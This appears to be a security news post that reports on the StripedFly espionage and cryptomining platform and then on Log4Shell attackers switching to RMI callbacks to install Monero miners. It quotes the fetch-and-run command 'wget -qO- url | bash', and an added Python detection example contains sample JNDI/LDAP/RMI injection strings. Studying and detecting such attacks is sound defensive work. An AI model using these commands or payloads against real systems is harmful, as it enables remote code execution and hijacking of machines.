StripedFly: Cryptomining Tool Infects 1 Million Targets Worldwide


Security firm Kaspersky Lab has revealed that a cryptominer, which never really generated a hefty crypto amount for its operators, is now a part of a bigger digital espionage campaign. Since 2017, the platform, known as StripedFly, has infected over a million Windows and Linux targets worldwide. StripedFly was most likely developed as a component of a well-funded state espionage program rather than a cybercriminal operation because it is modular and has several components for infiltrating targets' devices and gathering various types of data. Additionally, it has an update system that allows attackers to add new features and upgrades to the malware. 

Among other capabilities, StripedFly can steal access credentials from targeted systems, capture screenshots, obtain databases, private files, videos or other relevant data, and record audio in real time by accessing a target's microphone. Interestingly, StripedFly conceals communication and exfiltration between the malware and its command-and-control servers using a novel, proprietary Tor client.

There is also a ransomware component that attackers have occasionally used. The malware initially infects targets using a modified version of the infamous EternalBlue exploit, which was published by the US National Security Agency.

While StripedFly can mine Monero cryptocurrency, that is only a portion of what it is capable of. The researchers discovered it last year and thoroughly examined it before making their results public.

Kaspersky researchers Sergey Belov, Vilen Kamalov, and Sergey Lozhkin wrote in the post, "What we discovered was completely unexpected; the cryptocurrency miner was just one component of a much larger entity."

According to the researchers, the platform is essentially "a hallmark of APT malware" since it has update and delivery capabilities via reliable services like Bitbucket, GitHub, and GitLab, all using specially encrypted archives, as well as an integrated Tor network tunnel for communication with command-and-control (C2) servers. The researchers further note that the breadth of StripedFly is "astonishing", considering that it evaded detection for six years.

How Does StripedFly Operate?

The main structural component of the malware is a monolithic binary that the attackers can extend with pluggable modules. Every module, whether it adds functionality or provides a service, is responsible for setting up and maintaining its own callback function for communicating with a C2 server.

The platform initially appears on a network as a PowerShell script that seems to leverage a server message block (SMB) exploit, which looks to be a modified variant of EternalBlue. EternalBlue was first disclosed in April 2017 and remains a danger to unpatched Windows systems.

Depending on the availability of a PowerShell interpreter and the privileges available to the process, the malware uses a variety of persistence methods. The researchers note that, "typically, the malware would be running with administrative privileges when installed via the exploit, and with user-level privileges when delivered via the Cygwin SSH server."

The functionality modules are wide and varied, giving attackers a range of options for continuously monitoring a victim's network activity. They include the Monero cryptominer mentioned earlier, a variety of command handlers, a credential harvester, repeatable tasks that record microphone input, take screenshots and run other jobs on a schedule, a reconnaissance module that gathers extensive system data, and SMBv1 and SSH infectors that provide worming and penetration capabilities.

Log4j Attackers Switch to Injecting Monero Miners via RMI

The most significant vulnerability identified recently has dominated the news over the last few days. The vulnerability, Log4Shell or LogJam and officially termed CVE-2021-44228, is an unauthenticated RCE flaw that permits total system control on systems running Log4j 2.0-beta9 through 2.14.1. 

As per BleepingComputer, some threat actors using the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI, or even merged the two in a single request, to boost their chances of success. This is a big step forward in the ongoing attack, and firms should be aware of it as they try to secure all possible channels. 

For the time being, it is threat actors hijacking resources for Monero mining who have adopted this approach, but others may follow suit at any time. The majority of attacks targeting the Log4j "Log4Shell" vulnerability have used the LDAP (Lightweight Directory Access Protocol) service.

Switching to the RMI (Remote Method Invocation) API may appear counter-intuitive at first sight, given that this technique is subject to additional checks and limitations. 

However, this is not always the case, and if we consider that some JVM (Java Virtual Machine) versions may not enforce strict rules, RMI may be an easier way to achieve RCE (remote code execution) than LDAP. Furthermore, LDAP queries have become a well-established part of the infection chain, and defenders are keeping a close eye on them. Many IDS/IPS solutions, for example, currently filter requests containing JNDI and LDAP strings, so RMI may be overlooked for the time being. In some cases, Juniper recognised both RMI and LDAP services in the same HTTP POST request.

As per the source, “This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script. During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine."

"This obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x86_64 Linux targets. The full script also adds persistence via the cron subsystem."

"A different attack, also detected by Juniper Threat Labs, tries both RMI and LDAP services in the same HTTP POST request in hopes that at least one will work. The LDAP injection string is sent as part of the POST command body. An exploit string in the POST body is unlikely to succeed given most applications do not log the post body, which can be binary or very large, but by tagging the string as "username" in the JSON body, the attackers hope to exploit applications that will treat this request as a login attempt and log the failure."
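The detection gap described above (rules that match only JNDI+LDAP and miss RMI, and lookups hidden in a JSON "username" field) is illustrated by the following added example, which is not part of the original post or of Juniper's tooling. It scans constructed sample HTTP requests for JNDI lookup strings of any scheme and reports where each one sat; hostnames and paths are placeholders.

```python
import json
import re
# JNDI URL schemes a lookup can reference. Rules that match only "ldap"
# (as many IDS/IPS rules did) miss the "rmi" variant discussed above.
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns")
# Plain "${jndi:<scheme>://...}" lookups only (no nested-lookup obfuscation).
JNDI_RE = re.compile(
    r"\$\{jndi:(" + "|".join(JNDI_SCHEMES) + r")://[^}]*\}", re.IGNORECASE
)

def find_jndi_lookups(text):
    """Return (scheme, matched_lookup) pairs found in a string."""
    return [(m.group(1).lower(), m.group(0)) for m in JNDI_RE.finditer(text)]

def scan_request(raw):
    """Scan one raw HTTP request; each finding records where the lookup sat."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    findings = []
    for line in head.splitlines():
        for scheme, match in find_jndi_lookups(line):
            findings.append({"where": "header", "scheme": scheme, "lookup": match})
    try:
        obj = json.loads(body) if body.strip() else None
    except json.JSONDecodeError:
        obj = None
    if isinstance(obj, dict):
        # JSON body: attribute hits to the field (e.g. "username") that carried them.
        for key, value in obj.items():
            if isinstance(value, str):
                for scheme, match in find_jndi_lookups(value):
                    findings.append({"where": "json:" + key, "scheme": scheme, "lookup": match})
    else:
        for scheme, match in find_jndi_lookups(body):
            findings.append({"where": "body", "scheme": scheme, "lookup": match})
    return findings

# Constructed sample requests (not captured traffic); lookup.invalid is a placeholder.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1\nHost: app.example\n"
    "User-Agent: ${jndi:ldap://lookup.invalid:1389/a}\n\n",
    # Both services in one POST, with the RMI lookup tagged as "username" in JSON.
    "POST /login HTTP/1.1\nX-Forwarded-For: ${jndi:ldap://lookup.invalid/b}\n\n"
    '{"username": "${jndi:rmi://lookup.invalid:1099/c}", "password": "x"}',
    "GET /status HTTP/1.1\nHost: app.example\nUser-Agent: Mozilla/5.0\n\n",
]

def schemes_per_request(requests=SAMPLE_REQUESTS):
    """Sorted set of JNDI schemes seen in each request, for quick triage."""
    return [sorted({f["scheme"] for f in scan_request(r)}) for r in requests]
```

Matching the literal lookup prefix is enough to show the LDAP-only gap; production rules also need to handle Log4j's nested lookup syntax, which this example deliberately leaves out.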

Threat actors appear to be interested in mining Monero on hacked devices and promote it as an apparently innocent activity that "ain't going to hurt anyone else." The miner is built for x86_64 Linux systems and uses the cron subsystem for persistence. Although the majority of attacks have targeted Linux systems, CheckPoint states that its investigators have discovered the first Win32 program to use Log4Shell, called 'StealthLoader.'

The only way to combat what has become one of the most serious vulnerabilities in recent history is to upgrade Log4j to version 2.16.0. Administrators should also keep an eye on Apache's security advisories for new version announcements and apply them as soon as possible.